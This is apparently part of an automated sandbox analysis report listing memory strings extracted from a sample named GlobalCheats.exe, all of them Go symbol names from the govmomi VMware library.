Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1101
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2431
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3762
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*LimitExceeded).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1102
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2434
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3765
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1103
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2433
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3764
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1104
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2436
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3767
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfElement).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3766
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2435
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1105
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidVmState).GetInvalidState
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75BBED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: *types.VMwareDvsIpfixCapability
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ReconnectHostRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3758
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2427
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2426
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3757
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2429
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2428
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3759
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VAppConfigSpec).GetVmConfigSpec
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualSerialPortThinPrintBackingInfo).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*WakeOnLanNotSupportedByVmotionNICFault).GetHostPowerOpFailed
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3750
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2421
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3752
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2420
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3751
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2423
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3754
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2422
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3753
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2425
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3756
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2424
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3755
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RemoveVirtualNic
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfUnsupportedDeviceExport).GetOvfExport
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.HostInventoryFullEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2416
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3747
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*FeatureRequirementsNotMet).GetVmConfigFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RetrieveHostSpecificationRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2415
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3746
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3749
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2418
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2417
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3748
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2419
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3741
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2410
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3740
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2412
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3743
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2411
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3742
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2414
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3745
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmPortGroupProfile).GetApplyProfile
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.NvdimmNamespaceDeleteSpec
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2413
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3744
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*LicenseDowngradeDisallowed).GetRuntimeFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotChangeVsanClusterUuidFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2405
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3736
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3735
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2404
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualDeviceBackingOption).GetVirtualDeviceBackingOption
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3738
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2407
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2406
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3737
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2409
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2408
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3739
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3730
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*LicenseExpiredFault).GetNotEnoughLicenses
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ResourceAllocationOption).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2401
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3732
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2400
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3731
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2403
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3734
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2402
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3733
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DiskTooSmall).GetVsanDiskFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CustomizationIpV6Generator).GetCustomizationIpV6Generator
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualNVMEController).GetVirtualController
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfConsumerCallbackFault).GetOvfFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3725
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3724
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3727
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3726
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3729
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*MemorySizeNotSupportedFault).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3728
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfInvalidValueReference).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidClientCertificateFault).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3721
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3720
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*UserLogoutSessionEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3723
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3722
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotAccessVmDisk).GetCannotAccessVmDevice
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*GatewayOperationRefused).GetGatewayConnectFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*WakeOnLanNotSupported).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VirtualDevicePipeBackingOption
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*NetIpConfigSpecIpAddressSpec).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3714
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3713
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3716
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*LegacyNetworkInterfaceInUseFault).GetVmConfigFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3715
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3718
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3717
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ExtendedEvent).GetEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3719
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmMessageWarningEvent).GetVmEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ScheduledTaskStartedEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualBusLogicController).GetVirtualSCSIController
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3710
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3712
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RunScheduledTaskRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3711
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*NasSessionCredentialConflictFault).GetNasConfigFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.CreateFolder
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidState).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.HostNewNetworkConnectInfo
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VmInstanceUuidAssignedEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RefreshDateTimeSystem
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.HostDasErrorEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3703
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3702
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3705
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3704
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3707
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3706
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3709
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*GeneralEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3708
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ReplicationVmInProgressFault).GetReplicationVmFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VirtualMachineWipeResult
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3701
